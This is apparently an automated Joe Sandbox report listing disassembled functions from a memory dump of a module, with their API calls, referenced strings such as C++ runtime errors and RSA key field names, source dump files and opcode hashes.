Function 6D085810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D08584D

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

VariantClear.OLEAUT32(00000000), ref: 6D085899

Strings

vector<T> too long, xrefs: 6D085848

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2677079660-3788999226
Opcode ID: ad95e03ea6efc833e3ef3930983cd29121cc1a2c4418aaaccfdb87cb3bf97c53
Instruction ID: dbf2e2769c445c57685edd50600d7eced7487b1de70f1a10c84ee23e31e89a82
Opcode Fuzzy Hash: ad95e03ea6efc833e3ef3930983cd29121cc1a2c4418aaaccfdb87cb3bf97c53
Instruction Fuzzy Hash: B221A476A046059FEB10CF68D884B7EB7F5FF48324F61462EE556E3781DB30A9008B91

Uniqueness

Uniqueness Score: -1.00%

Function 6D075750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D07576B

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

std::_Xinvalid_argument.LIBCPMT ref: 6D075782

Strings

string too long, xrefs: 6D075766, 6D07577D

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 3fe4b1a8fccd307ad1ddbb505067dfc5dbd9c2fee74f5be58027173ca3ea7be5
Instruction ID: eab88659beb86f8b16ec7923e6562a8e3e771c696cf6c8f9384504fcf2624307
Opcode Fuzzy Hash: 3fe4b1a8fccd307ad1ddbb505067dfc5dbd9c2fee74f5be58027173ca3ea7be5
Instruction Fuzzy Hash: 7411E7373086109FF330995CB880BBAF7ECEF95621B60061FE552CB680C7619804C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 6D0646B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D0646C4

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D06470B

Strings

string too long, xrefs: 6D0646BF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: d3ae577ee83b27b4f8f409543dd72c32ff465e818e106cb8eee90e4ee0a1454e
Instruction ID: 1346176792d76006de3d6b0ecdf35e778e057c1a0568d4c23d83b04fa6821479
Opcode Fuzzy Hash: d3ae577ee83b27b4f8f409543dd72c32ff465e818e106cb8eee90e4ee0a1454e
Instruction Fuzzy Hash: 3311CB7610C7516FF7209D78A8D0B7EB7ECAF5A218F204A2EE59783581D771E4488372

Uniqueness

Uniqueness Score: -1.00%

Function 6D094D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D094E00

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

ArraySink: missing OutputBuffer argument, xrefs: 6D094D91
OutputBuffer, xrefs: 6D094D77

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
API String ID: 3718517217-3781944848
Opcode ID: fa5168e43c044d39d794bfd96b67c0fd247910dc4708a6ff0f61fbb00172960e
Instruction ID: 873357ce8c464ac926c4fa6133365c59a5a2c77e07e1ee6cf3b64abc060e244c
Opcode Fuzzy Hash: fa5168e43c044d39d794bfd96b67c0fd247910dc4708a6ff0f61fbb00172960e
Instruction Fuzzy Hash: 353134B150C780AFE314CF68D480B5BBBE4BB99754F404A1EF6A987391DB74D408CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D070150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D070201

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

StringSink: OutputStringPointer not specified, xrefs: 6D07019B
OutputStringPointer, xrefs: 6D07018C

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3718517217-1331214609
Opcode ID: 2847ba032a379ffa7128a1cf838f775b41a8e29b35df9df18a7967756ffc70d0
Instruction ID: 785cd3c0ff372ccbb5045aca71beda2f1829456023aa056b37896aa4ffff7b07
Opcode Fuzzy Hash: 2847ba032a379ffa7128a1cf838f775b41a8e29b35df9df18a7967756ffc70d0
Instruction Fuzzy Hash: 37213371D04288AFDB04DFD8D890BEDFBB4EB49354F10425EE525A7381DB355504CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6D064620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D064636

Part of subcall function 6D0C9125: std::exception::exception.LIBCMT ref: 6D0C913A
Part of subcall function 6D0C9125: __CxxThrowException@8.LIBCMT ref: 6D0C914F
Part of subcall function 6D0C9125: std::exception::exception.LIBCMT ref: 6D0C9160

_memmove.LIBCMT ref: 6D06466F

Strings

invalid string position, xrefs: 6D064631

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 523262d4188758ca261dcb65716d1a1c9cad772c313691adbc092c88f3d8975a
Instruction ID: 9721eae8b5ead0369d860a83b8efbdc26ca22822e3681c2a8a99699ba779b633
Opcode Fuzzy Hash: 523262d4188758ca261dcb65716d1a1c9cad772c313691adbc092c88f3d8975a
Instruction Fuzzy Hash: E9012B31308280ABE3218D5CECA0B1AB3EAEBCC614B24892DE295C7741C6B0DC4183B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D09ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6D09ACF8

Strings

Modulus, xrefs: 6D09AD30
PublicExponent, xrefs: 6D09AD1F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 7571acb530c91fe2b7421c06dbae57051bb0d204dfbdeed1c2a22c729e3e7c73
Instruction ID: 05af6bcd833da92c2d941cbfcb2c0537dd30f6dc41a63ef3e40d8c8e431b6671
Opcode Fuzzy Hash: 7571acb530c91fe2b7421c06dbae57051bb0d204dfbdeed1c2a22c729e3e7c73
Instruction Fuzzy Hash: CE11C170D193045FE200DF298844A5BBBE4EFD6248F10561EF9899F260D730D849CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BB7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6D0BB848

Strings

Modulus, xrefs: 6D0BB880
PublicExponent, xrefs: 6D0BB86F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 3d5e28b760fb55eed508f915b9bf94839b322aa5a120d23cba141c6fa9f3f254
Instruction ID: d312c401d2c11d8319fdd3e0b9a3bd2091366032cb01dca6a8a7ad496e0733bf
Opcode Fuzzy Hash: 3d5e28b760fb55eed508f915b9bf94839b322aa5a120d23cba141c6fa9f3f254
Instruction Fuzzy Hash: A811E37090D3446FD700DF29988065BFBE4EFE6248F00062EF9845B291DB31D849CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6D09B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D09B605

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D09B634

Strings

vector<T> too long, xrefs: 6D09B600

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: c6af11547ea84315d4e8cfddd4176a5378354343052014d2125bcc77e970965f
Instruction ID: c4d4ddc69d3aec649d630c6809c262680d9be85ce4a5be270ed4cfd52df8929e
Opcode Fuzzy Hash: c6af11547ea84315d4e8cfddd4176a5378354343052014d2125bcc77e970965f
Instruction Fuzzy Hash: 6801D4B26042099FE324DEA9ECC0E6BB3D8EB54214715492DE99BC3250E674F800CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C4230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D0C4241

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D0C4277

Strings

vector<bool> too long, xrefs: 6D0C423C

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<bool> too long
API String ID: 1785806476-842332957
Opcode ID: d2f037e4e46d281ebc332c9d8f4588fa41c3addb31c4821a050717d3e87a1bad
Instruction ID: 9c599d0634eb5ffbba5a99953425e2bf9557e025653e8a8e8a3f35e38b0ed8fe
Opcode Fuzzy Hash: d2f037e4e46d281ebc332c9d8f4588fa41c3addb31c4821a050717d3e87a1bad
Instruction Fuzzy Hash: BF01F772A041056FE704CFA9DCD1ABEF3A9FB88358FA1422EE51687680E730F904C791

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C3840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D0C3855

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D0C3880

Strings

vector<T> too long, xrefs: 6D0C3850

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 74195e792490df6a93fd22baba16f2297e3ca1846ed324c0ee2b075716b2f6c3
Instruction ID: e88304e3b79dc6af788b65baa2fcca9f7ea77716450faf3359e193aa53bf86cd
Opcode Fuzzy Hash: 74195e792490df6a93fd22baba16f2297e3ca1846ed324c0ee2b075716b2f6c3
Instruction Fuzzy Hash: FF01D4725047099FE320DFE9DC8496FB3E8EF482147114A3DE5AAC3650EA30F8048B61

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CBFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D0CABC3: __getptd.LIBCMT ref: 6D0CABC9
Part of subcall function 6D0CABC3: __getptd.LIBCMT ref: 6D0CABD9

__getptd.LIBCMT ref: 6D0CBFC3

Part of subcall function 6D0CEAE6: __getptd_noexit.LIBCMT ref: 6D0CEAE9
Part of subcall function 6D0CEAE6: __amsg_exit.LIBCMT ref: 6D0CEAF6

__getptd.LIBCMT ref: 6D0CBFD1

Strings

csm, xrefs: 6D0CBFDF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction ID: 0a7a1a995b07e11c0d3ce3bb35237c73998094edb37c009b63540ecce5c3e9eb
Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction Fuzzy Hash: 760164348087068FFB248F61D444BAEB3F5BF08315F72482EE0519B2A0DB309990CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D3EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6D0D3ED9
DName::DName.LIBCMT ref: 6D0D3EE5

Strings

{flat}, xrefs: 6D0D3ED4

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 9410573465e78683d7456b872e7d0ec210d22978c5c4e43ae67af5504102b6fd
Instruction ID: 58215566bcec151b892890bc588774182239a90e7ed0d255d54cc50ede0352a1
Opcode Fuzzy Hash: 9410573465e78683d7456b872e7d0ec210d22978c5c4e43ae67af5504102b6fd
Instruction Fuzzy Hash: 0FF0E5711443449FEB50CF58D050BB83BA19B8A395F05C046F90C0F3C2C771D442CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D077673 Relevance: 5.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,400BD10B), ref: 6D0776AD
LeaveCriticalSection.KERNEL32(?,?,?,400BD10B), ref: 6D0776FF
EnterCriticalSection.KERNEL32(400BD10B,?,?,?,400BD10B), ref: 6D07770D
LeaveCriticalSection.KERNEL32(400BD10B,?,00000000,?,?,?,?,400BD10B), ref: 6D07772A

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

Part of subcall function 6D076D40: _rand.LIBCMT ref: 6D076DEA

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
